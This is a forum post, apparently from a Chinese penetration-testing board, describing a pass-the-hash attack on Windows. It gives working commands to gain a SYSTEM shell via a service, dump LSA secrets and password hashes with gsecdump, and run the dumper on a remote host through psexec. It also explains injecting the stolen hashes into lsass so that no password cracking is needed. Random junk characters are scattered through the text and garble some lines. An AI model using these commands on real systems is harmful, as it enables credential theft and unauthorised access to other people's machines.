找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
返回列表 发新帖
查看: 2425|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:; Z  U4 }4 K% ~3 a+ H# o8 [! o

* ]& t  B6 W4 X1 P$ \C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
% [2 G7 z7 ]/ H' v- Z5 |  U[SC] CreateService SUCCESS' R& I- ^; q1 G4 A( k# g; m

4 B/ s$ I% i( p7 TC:\>sc start shellcmdline
. A; }! H+ f* T" n0 s3 R0 k* O2 B/ d[SC] StartService FAILED 1053:" v  g8 E, }, X/ g
+ E  A9 X$ D1 F+ r
The service did not respond to the start or control request in a timely fashion.
: j% G2 N( v  g9 I6 m# w! }
, F, E6 k: i  B% N9 FC:\>sc delete shellcmdline' o9 @% }, D/ D0 s: }) C
[SC] DeleteService SUCCESS$ T% W1 W: }6 H1 b7 k6 V

" {3 C. }' Z0 {0 V) v------------5 _8 u1 n2 Q/ X5 N# l' v

* l+ F+ f/ k* aThen in the new DOS window:
) D- u2 ^' a4 d5 L( o6 y- k- a& H7 w: B& l
Microsoft Windows XP [Version 5.1.2600]
* T* R* I. ~7 q. x(C) Copyright 1985-2001 Microsoft Corp.
  k2 H. Z" u5 t- F% N1 q6 b" I
/ @1 p* i3 G. W( V$ s, qC:\WINDOWS\system32>whoami. ^; u* N: N  d' X' f) y- m6 b! u5 k
NT AUTHORITY\SYSTEM
& y! d2 O# q3 s, t
( G3 d: v, B3 o3 jC:\WINDOWS\system32>gsecdump -h
1 A! U. S5 P0 |gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
5 T# _# e0 D  u2 V. X/ Z1 e( P2 }usage: gsecdump [options]0 B1 W6 d$ a9 e, E# I$ R( N
& x+ M7 Y% R+ N
options:
: ~) }7 v5 m7 E7 z5 [8 b-h [ --help ] show help% j* f2 Q. n' l8 r4 `( o
-a [ --dump_all ] dump all secrets
6 N/ Q( F  d' ^; G3 P-l [ --dump_lsa ] dump lsa secrets# h, s9 M( G6 t) n0 p$ U
-w [ --dump_wireless ] dump microsoft wireless connections4 C9 B. B, T/ F  X2 w
-u [ --dump_usedhashes ] dump hashes from active logon sessions9 _& D6 n/ e' [* E2 R2 s6 g
-s [ --dump_hashes ] dump hashes from SAM/AD0 a# A6 [( i& N, U3 M9 M; Y
) B4 g! p, L0 C, `5 ]# d
Although I like to use:1 S" R) e7 U* ]) W
/ E8 V- A: ~. _; v9 d
PsExec v1.83 - Execute processes remotely
2 B9 }: q: J( h# D; p. R4 LCopyright (C) 2001-2007 Mark Russinovich
8 q- e2 D2 {3 D" \Sysinternals - 链接标记[url]www.sysinternals.com[/url]8 x, ~7 M, A5 Z$ t1 U
$ K8 K5 S! P/ c/ P
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT, c, f- `4 ~* I  ~

8 f/ f+ m" [# ~( k' Z# Gto get the hashes from active logon sessions of a remote system.6 \+ k' ^" S/ }6 c4 Y& Q
  S9 f* }. P5 f
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
, w. [8 t4 A; e4 H7 I3 j
/ l4 f* B1 M8 }  B提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
3 Y6 c- e2 p6 a" f/ |8 X原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
* N9 m# j" t* {1 E8 ]9 e/ W. u7 {' u
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' N- n0 P. {6 z1 v" X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表